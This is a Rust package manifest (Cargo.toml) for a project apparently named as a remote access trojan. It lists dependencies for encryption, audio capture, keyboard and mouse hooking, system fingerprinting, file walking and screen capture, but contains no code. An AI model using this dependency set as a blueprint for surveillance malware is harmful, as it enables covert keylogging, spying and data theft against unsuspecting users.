[package]
name = "avernus_rat_rust"
version = "0.1.0"
edition = "2021"

[dependencies]
tokio = { version = "1.0", features = ["full"] }
aes = "0.8"
cbc = "0.1"
cpal = "0.15.0"
rdev = "0.5.3"
whoami = "1.5"
sysinfo = "0.30"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
walkdir = "2.5"
scrap = "0.4"   
image = "0.24"    